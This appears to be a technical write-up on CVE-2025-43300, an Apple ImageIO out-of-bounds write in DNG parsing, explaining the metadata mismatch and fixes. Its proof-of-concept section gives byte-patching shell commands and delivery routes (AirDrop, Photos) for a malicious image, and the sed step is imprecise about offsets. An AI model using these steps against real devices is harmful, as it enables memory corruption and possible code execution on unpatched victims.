iOS 18.6.1 DNG Vulnerability Deep Analysis (CVE-2025-43300)

Vulnerability Overview

CVE ID: CVE-2025-43300
CVSS Score: 8.8 (High)
Vulnerability Type: Out-of-bounds Write
Affected Component: Apple ImageIO framework
Affected Versions: iOS 18.6.1 and earlier, macOS Sonoma 14.7.7 and earlier
Fixed Versions: iOS 18.6.2, macOS Sonoma 14.7.8, macOS Sequoia 15.6.1

Apple officially confirmed that this vulnerability has been used in "extremely sophisticated attacks" targeting specific individuals. Processing malicious image files may lead to memory corruption and arbitrary code execution.

Technical Background

DNG File Format Architecture

DNG (Digital Negative) is an open RAW image format developed by Adobe, essentially an enhanced TIFF container. DNG files use a hierarchical structure:

TIFF Container Layer: Contains image metadata, directory structure (IFD), and subdirectories (SubIFD)
JPEG Compression Layer: RAW image data is stored using the JPEG lossless compression algorithm
Metadata System: The TIFF tag system controls image parsing parameters

JPEG Lossless Compression Mechanism

JPEG lossless compression uses the SOF3 (Start of Frame 3) marker to define the image structure:

SOF3 Marker Structure:

• Marker ID: 0xFFC3
• Length Field: 2 bytes
• Precision: Usually 8 or 16 bits
• Image height and width
• Component Count: Defines the number of color components (key field)
• Sampling factor for each component

SamplePerPixel TIFF Tag:

• Tag ID: 277 (0x115)
• Defines the number of color components per pixel
• Used for memory allocation and buffer calculation

Vulnerability Location Analysis

The vulnerability is located in the JPEG lossless decompression implementation within Apple's ImageIO framework, specifically within the RawCamera.bundle component. This component is responsible for handling various camera RAW formats, including the JPEG lossless compressed data of DNG files.

Due to symbol stripping, the specific function call path is difficult to trace, but the vulnerability trigger point is in the boundary check logic of component buffer allocation and data writing.

Vulnerability Trigger Mechanism Details

Key Byte Modification Analysis

First Modification (0x2FD00): SamplePerPixel field

1Original Value: 01 (1 component/pixel)
2Modified Value: 02 (2 components/pixel)

This modification tells the TIFF parser that each pixel contains 2 color components, and the system allocates a processing buffer of the corresponding size accordingly.

Second Modification (0x3E40B): SOF3 component count

1Original Value: 02 (2 components)
2Modified Value: 01 (1 component)

This modification tells the JPEG decoder that only 1 color component's data needs to be processed.

Metadata Mismatch Mechanism

These two modifications create a fatal metadata mismatch:

1. Buffer Allocation Phase: The system allocates memory space for 2 components based on SamplePerPixel=2
2. Data Processing Phase: The JPEG decoder, based on SOF3 component count=1, considers that only 1 component needs to be processed
3. Out-of-bounds Access: When the system attempts to access the data of the second component, an out-of-bounds write occurs

Code Path Differences

Not all DNG files will trigger this vulnerability; specific conditions must be met:

• Using JPEG lossless compression (SOF3 marker)
• Containing specific SubIFD structures
• Generated by specific cameras or tools

DNG files generated using standard tools such as Adobe DNG Converter or dnglab usually will not reach the vulnerable code path.

Memory Mechanism Deep Analysis

Heap Memory Allocation Strategy

The ImageIO framework uses dynamic memory allocation when processing DNG files:

1. Metadata Parsing: Reads TIFF tags to determine image parameters
2. Buffer Allocation: Calculates the required memory size based on SamplePerPixel
3. JPEG Decoding: Initializes the decoder and allocates component buffers
4. Data Writing: Processes color component data one by one

Missing Boundary Check

The key problem lies in the lack of buffer boundary checks:

1// Pseudocode example
2int samples_per_pixel = tiff_get_samples_per_pixel();  // Value is 2
3int jpeg_components = sof3_get_component_count();      // Value is 1
4
5// Allocate buffer based on TIFF tag
6buffer = allocate_buffer(width * height * samples_per_pixel);
7
8// JPEG decoder processing - missing boundary check
9for(int i = 0; i < jpeg_components + extra_access; i++) {
10    write_component_data(buffer + i * component_size, data);  // Out-of-bounds write
11}

Memory Corruption Impact

Out-of-bounds writes may affect:

• Adjacent heap memory blocks
• Memory management structures (such as malloc metadata)
• Virtual function table pointers of other objects
• Important system data structures

Attack Payload Construction

POC Construction Steps

Based on the researcher's provided method:

1. Obtain a basic DNG file:

   Download address: https://www.dpreview.com/sample-galleries/4949897610/pentax-k-3-mark-iii-sample-gallery/2771457523

2. Precise byte modification:

   bash

   1# Modify SamplePerPixel (position 0x2FD00)
   2xxd -p sample.dng | sed 's/01/02/' | xxd -r -p > modified.dng
   3
   4# Modify SOF3 component count (position 0x3E40B)
   5printf '\x01' | dd of=modified.dng bs=1 seek=$((0x3E40B)) conv=notrunc

3. Trigger the vulnerability:

   • Send via AirDrop to iOS device
   • Open in the Photos app
   • Or load through other image processing applications

Attack Vector Characteristics

High Concealment: The modified file can still be displayed normally in most viewers
Easy Propagation: Can be spread through various channels (social media, email, etc.)
Difficult Detection: Requires in-depth file format analysis to detect anomalies
Wide Impact: Affects all unpatched iOS and macOS devices

Protective Measures and Repair Analysis

Apple Official Fix

Apple implemented "improved boundary checks" in the affected systems:

• Strengthened cross-validation of TIFF tags and JPEG markers
• Added boundary checks before accessing component buffers
• Improved the security of memory allocation and release

General Protection Strategies

For developers:

1. Input Validation: Strictly validate all fields of the file format
2. Boundary Checks: Perform boundary validation before all buffer accesses
3. Cross-Validation: Verify consistency between different data sources
4. Secure Allocation: Use secure memory allocation and access patterns

For users:

1. Prompt Updates: Install security updates immediately
2. Careful Handling: Avoid opening images from unknown sources
3. Isolated Environment: Handle suspicious files in a secure environment

Detection and Defense

System administrators can consider:

• Deploying file format validation tools
• Monitoring abnormal memory access patterns
• Implementing application sandbox restrictions
• Using static analysis tools to check for similar vulnerabilities

Disclaimer: This analysis is for security research and protection purposes only. Do not use the related technology for malicious attacks or illegal activities.